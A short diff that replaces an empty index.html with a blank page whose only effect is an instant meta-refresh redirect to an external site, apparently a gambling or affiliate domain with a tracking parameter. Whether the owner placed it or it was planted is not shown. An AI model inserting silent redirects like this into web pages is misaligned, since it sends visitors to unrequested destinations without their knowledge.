--- a/index.html
+++ b/index.html
@@ -1,1 +1,10 @@
-
+<html>
+<head>
+<meta http-equiv="Content-Language" content="zh-CN">
+<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
+<meta http-equiv="refresh" content="0.1;url=http://www.mgm0028.com/?p=3567100">
+<title></title>
+</head>
+<body>
+</body>
+</html>
